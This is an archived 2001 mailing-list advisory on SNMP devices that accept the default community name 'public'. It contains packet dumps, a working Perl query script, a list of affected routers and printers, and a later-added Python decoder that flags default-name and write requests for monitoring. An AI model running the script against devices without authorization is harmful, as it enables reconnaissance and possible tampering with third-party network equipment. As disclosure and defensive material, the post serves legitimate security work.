OSEC

From: Nikita Kuznezov (nikZ-FOUNDATION.MOSBUSINESS.RU)
Date: Thu Apr 05 2001 - 16:54:00 CDT


             -={[ SNMP supporting network devices vulnerability exploit ]}=-
                                   english edition

    -=<( Authors

        VBh // underlings
        Privacy // underlings

    -=<( Authors' details

        format : ASCII, 80 characters per line
        date : 2001, April 3rd
        feedback : privacychat.ru

    -=<( Introduction

        SNMP (Simple Network Management Protocol) is supported by a huge number
    of network devices (for example network printer adapters, routers, etc.).
    One of the RFC documents that specify the SNMP protocol states approximately
    the following: "a network device may be considered fully manageable if it
    implements the SNMP protocol".

        According to the SNMP standard, all the information required to manage
    a remote network device is kept directly in the device's memory, in its MIB
    (Management Information Base). The SNMP protocol itself is a user-level
    interface for controlling a remote MIB.

        In a remote SNMP request, the "community name" field is used as the
    identifier for the request.

        Let us take a brief look at a typical SNMP request:

    0000: 20 53 52 43 00 00 44 45 53 54 00 00 08 00 45 00 SRC..DEST....E.
    0010: 00 4F 39 00 00 00 80 11 CC CC XX XX XX XX YY YY .O9........"....
    0020: YY YY 04 03 00 A1 00 3B CC CC 30 82 00 2F 02 01 .......;..0../..
    0030: 00 04 06 49 44 45 4E 54 36 A1 82 00 20 02 02 2C ...IDENT6... ..,
    0040: B0 02 01 00 02 01 00 30 82 00 12 30 82 00 0E 06 .......0...0....
    0050: 0A 2B 06 01 02 01 02 02 01 02 01 05 00 .+...........

        Here is the answer to the request above:

    0000: 44 45 53 54 00 00 20 53 52 43 00 00 08 00 45 00 DEST.. SRC....E.
    0010: 00 5D 01 93 00 00 77 11 CC CC YY YY YY YY XX XX .]....w..K....."
    0020: XX XX 00 A1 04 03 00 49 CC CC 30 3F 02 01 00 04 .......I.E0?....
    0030: 06 49 44 45 4E 54 36 A2 32 02 02 2C B0 02 01 00 .IDENT6.2..,....
    0040: 02 01 00 30 26 30 24 06 0D 2B 06 01 02 01 02 02 ...0&0$..+......
    0050: 01 02 88 80 80 03 04 13 33 43 6F 6D 20 45 74 68 ........3Com Eth
    0060: 65 72 4C 69 6E 6B 20 50 43 49 00 erLink PCI.

        (to preserve privacy, the Source and Destination IP address fields of the
    IP header are replaced with XX.XX.XX.XX and YY.YY.YY.YY; the IP and UDP
    header checksum fields are filled with CC.CC; the SNMP request's community
    name field contains the six bytes of a random string, "IDENT6")

        Obviously, we can only interact with a remote MIB if we know the
    "community name" that is configured on the remote SNMP agent.

    -=<( Vulnerability

        It turns out that many remote network devices supporting the SNMP
    protocol accept the default community name, "public".

        Here is an SNMP request that carries the string "public" as the
    community name:

    0000: 20 53 52 43 00 00 44 45 53 54 00 00 08 00 45 00 SRC..DEST....E.
    0010: 00 AD 35 00 00 00 80 11 CC CC XX XX XX XX YY YY ..5........"....
    0020: YY YY 04 03 00 A1 00 99 CC CC 30 82 00 8D 02 01 ........) 0.....
    0030: 00 04 06 70 75 62 6C 69 63 A0 82 00 7E 02 02 2C ...public......,
             ^^ - "string" type
                ^^ - string length
                   ^^ ^^ ^^ ^^ ^^ ^^ - community name
    0040: AC 02 01 00 02 01 00 30 82 00 70 30 82 00 0C 06 .......0..p0....
    0050: 08 2B 06 01 02 01 01 01 00 05 00 30 82 00 0C 06 .+.........0....
    0060: 08 2B 06 01 02 01 01 02 00 05 00 30 82 00 0C 06 .+.........0....
    0070: 08 2B 06 01 02 01 01 03 00 05 00 30 82 00 0C 06 .+.........0....
    0080: 08 2B 06 01 02 01 01 04 00 05 00 30 82 00 0C 06 .+.........0....
    0090: 08 2B 06 01 02 01 01 05 00 05 00 30 82 00 0C 06 .+.........0....
    00A0: 08 2B 06 01 02 01 01 06 00 05 00 30 82 00 0C 06 .+.........0....
    00B0: 08 2B 06 01 02 01 02 01 00 05 00 .+.........

        After sending the request shown above, we receive the following
    reply:

    0000: 44 45 53 54 00 00 20 53 52 43 00 00 08 00 45 00 DEST.. SRC....E.
    0010: 01 32 01 8F 00 00 77 11 CC CC YY YY YY YY XX XX .2....w..z....."
    0020: XX XX 00 A1 04 03 01 1E CC CC 30 82 01 12 02 01 .........)0.....
    0030: 00 04 06 70 75 62 6C 69 63 A2 82 01 03 02 02 2C ...public......,
    0040: AC 02 01 00 02 01 00 30 81 F6 30 81 8A 06 08 2B .......0..0....+
    0050: 06 01 02 01 01 01 00 04 7E 48 61 72 64 77 61 72 .........Hardwar
    0060: 65 3A 20 78 38 36 20 46 61 6D 69 6C 79 20 36 20 e: x86 Family 6
    0070: 4D 6F 64 65 6C 20 37 20 53 74 65 70 70 69 6E 67 Model 7 Stepping
    0080: 20 33 20 41 54 2F 41 54 20 43 4F 4D 50 41 54 49 3 AT/AT COMPATI
    0090: 42 4C 45 20 2D 20 53 6F 66 74 77 61 72 65 3A 20 BLE - Software:
    00A0: 57 69 6E 64 6F 77 73 20 32 30 30 30 20 56 65 72 Windows 2000 Ver
    00B0: 73 69 6F 6E 20 35 2E 30 20 28 42 75 69 6C 64 20 sion 5.0 (Build
    00C0: 32 31 39 35 20 55 6E 69 70 72 6F 63 65 73 73 6F 2195 Uniprocesso
    00D0: 72 20 46 72 65 65 29 30 18 06 08 2B 06 01 02 01 r Free)0...+....
    00E0: 01 02 00 06 0C 2B 06 01 04 01 82 37 01 01 03 01 .....+.....7....
    00F0: 02 30 0F 06 08 2B 06 01 02 01 01 03 00 43 03 0E .0...+.......C..
    0100: 43 76 30 0C 06 08 2B 06 01 02 01 01 04 00 04 00 Cv0...+......
    0110: 30 11 06 08 2B 06 01 02 01 01 05 00 04 05 55 4D 0...+.........UM
    0120: 50 52 55 30 0C 06 08 2B 06 01 02 01 01 06 00 04 PRU0...+........
    0130: 00 30 0D 06 08 2B 06 01 02 01 02 01 00 02 01 02 .0...+..........

        Here is a small program written in Perl that queries a remote MIB
    using "public" as the community name:

    -=<( Exploit program

    use IO::Socket;
    use IO::Select;
    use strict;

    print "SNMP analyzer via community name 'public' done by VBh // underlings\n";

    my($sock, $host, $pkt, $msg, $port, $ipaddr, $hishost,
       $MAXLEN, $Lport,$DSTport, $TIMEOUT, $community, $oid);

    $community="public";

    $MAXLEN = 1024;
    $Lport = 5151;
    $TIMEOUT = 5;          # seconds to wait for each reply
    my @str = ("sysDescr","sysObjectID","sysUpTime","sysContact","sysName",
    "sysLocation", "sysServices");

    unless (@ARGV == 2) { die "usage: $0 <host> <port>" }
    ($host, $DSTport) = @ARGV;

    for (my $i=1; $i<=7; $i++) {
    # OID 1.3.6.1.2.1.1.$i (system group); the instance ".0" is appended below
    $oid="\x2B\x06\x01\x02\x01\x01".chr($i);

    # SNMPv1 GetRequest with BER short-form lengths; the fixed length bytes
    # (\x04\x06, \xA0\x19, \x30\x0E, \x30\x0C) assume the six-byte community
    # "public" and a seven-byte OID
    $pkt = "\x30".chr(length($community)+length($oid)+25)."\x02\x01\x00".
           "\x04\x06".$community.
           "\xA0\x19\x02\x01\x00\x02\x01\x00".
           "\x02\x01\x00\x30\x0E\x30\x0C\x06".
           chr(length($oid)+1).$oid."\x00".
           "\x05\x00";

    $sock = IO::Socket::INET->new (Proto => 'udp',
                                   LocalPort => $Lport+$i,
                                   PeerPort => $DSTport,
                                   PeerAddr => $host) ||
     die "Creating socket: $!\n";

    $sock->send($pkt) || die "send: $!";

    # recv() alone would block forever on a silent host, so wait at most
    # $TIMEOUT seconds; in a short-form reply to this request the value
    # bytes start at offset 40, which is what the "x40" template skips
    if (IO::Select->new($sock)->can_read($TIMEOUT) && $sock->recv($msg, $MAXLEN)) {
    print "$host $str[$i-1]: ".unpack("x40 A*", $msg)."\r\n";
    } else {
    print "$host $str[$i-1]: no reply\r\n";
    }
    shutdown ($sock, 2);
    }

    -=<( Statistics

        It wasn't our purpose to collect an extensive statistics list concerning
    this vulnerability. Here is a small list of remote systems on which we have
    already tested this vulnerability:

        - 3Com routers (SuperStack II), various 3Com network adapters
        - Cisco routers
        - Templex routers
        - Hewlett Packard network printers
        - Xerox network printers

        We suppose that, with some persistence, this list may be greatly
    expanded.

    -=<( Destructive possibility

         Besides all that was said above, there are some network devices that
    allow records to be written into their MIBs. All the tests we performed on
    the whole range of Hewlett Packard network printers confirmed this
    supposition.

        For understandable reasons, we will not publish an exploit program
    that implements this destructive possibility.
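
        The request dissected above (community name as the request's only
    identifier, BER tags and lengths, one varbind per OID) and the MIB-write
    possibility just mentioned are exactly what a network monitor should be
    looking at. As an added example that is not part of the original post or the
    authors' code, here is a minimal SNMPv1 decoder in Python: it parses the
    "public" GetRequest re-typed from the dump above (Ethernet, IP and UDP headers
    stripped) and reports what a monitor would flag, namely a community name from
    the assumed DEFAULT_COMMUNITIES list and any SetRequest, which is a write to
    the MIB. The function names and the sample bytes are this example's own.

```python
PDU_TYPES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse", 0xA3: "SetRequest"}
DEFAULT_COMMUNITIES = {"public"}          # assumed policy list of names to alert on; extend per site
# SNMP payload of the "public" GetRequest dumped above (UDP offset 0x2A on), re-typed from the dump.
SAMPLE_GETREQUEST = bytes.fromhex(
    "30 82 00 8d 02 01 00 04 06 70 75 62 6c 69 63 a0 82 00 7e 02 02 2c ac 02 01 00 02 01 00 30 82 00 70"
    + "".join("30 82 00 0c 06 08 2b 06 01 02 01 %s 00 05 00" % s        # seven varbinds, sysDescr..ifNumber
              for s in ("01 01", "01 02", "01 03", "01 04", "01 05", "01 06", "02 01")))

def read_tlv(buf, pos):                                  # -> (tag, value, next_pos) of the BER element at buf[pos]
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                    # long-form length: 0x8N then N bytes (82 00 8d above)
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def read_seq(buf):                                       # yield every (tag, value) packed back to back in buf
    p = 0
    while p < len(buf):
        tag, val, p = read_tlv(buf, p)
        yield tag, val

def decode_oid(raw):
    arcs, acc = [raw[0] // 40, raw[0] % 40], 0           # first byte packs arcs 1 and 2 (0x2b -> 1.3)
    for b in raw[1:]:                                    # remaining arcs: base-128 groups, high bit = continue
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs, acc = arcs + [acc], 0
    return ".".join(map(str, arcs))

def decode_value(tag, raw):                              # INTEGER-like -> int, OCTET STRING -> text, OID -> dotted
    if tag in (0x02, 0x41, 0x42, 0x43):                  # INTEGER, Counter, Gauge, TimeTicks
        return int.from_bytes(raw, "big", signed=tag == 0x02)
    return raw.decode("ascii", "replace") if tag == 0x04 else decode_oid(raw) if tag == 0x06 else None

def parse_snmpv1(pkt):                                   # v2c shares this layout; malformed input raises
    (_, msg), = read_seq(pkt)                            # Message ::= SEQUENCE { version, community, PDU }
    (_, ver), (_, comm), (pdu_tag, pdu) = read_seq(msg)
    (_, rid), _, _, (_, vbl) = read_seq(pdu)             # request-id, error-status, error-index, VarBindList
    varbinds = []
    for _, vb in read_seq(vbl):                          # VarBind ::= SEQUENCE { OID, value }
        (_, oid), (vtag, vraw) = read_seq(vb)
        varbinds.append((decode_oid(oid), decode_value(vtag, vraw)))
    return {"version": ver[0], "community": comm.decode("ascii", "replace"), "pdu": PDU_TYPES[pdu_tag],
            "request_id": int.from_bytes(rid, "big", signed=True), "varbinds": varbinds}

def audit(pkt):                                          # findings a monitor would raise for this packet
    m = parse_snmpv1(pkt)
    checks = {"default community %r in %s" % (m["community"], m["pdu"]): m["community"] in DEFAULT_COMMUNITIES,
              "SetRequest (write) on " + ", ".join(o for o, _ in m["varbinds"]): m["pdu"] == "SetRequest"}
    return [finding for finding, hit in checks.items() if hit]
```

    The decoder handles the long-form BER lengths (82 00 xx) that the dumps use,
    so it can be run over captured UDP/161 payloads as they are.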

    -=<( Additional information

    Basic RFC documents that specify the SNMP and MIB-II concepts:

        1) RFC 1157, "A Simple Network Management Protocol (SNMP)". There you
    can easily find enough information about programming with the SNMP
    protocol.
        2) RFC 1213, "Management Information Base for Network Management of
    TCP/IP-based internets: MIB-II"

    Additional RFCs:

        3) 1067, 1098, 1158, 1161, 1212, 1239, 1303, 1351, 1352, 1354, 1441,
    1442, 1443, 1444, 1445, 1446, 1447, 1448, 1449, 1450, 1573, 1901, 1902, 1903,
    1904, 1905, 1906, 1907, 1908, 1909, 1910, 2011, 2012, 2013

        You may also find it worthwhile to look at the documentation and
    programs of native SNMP agents and managers.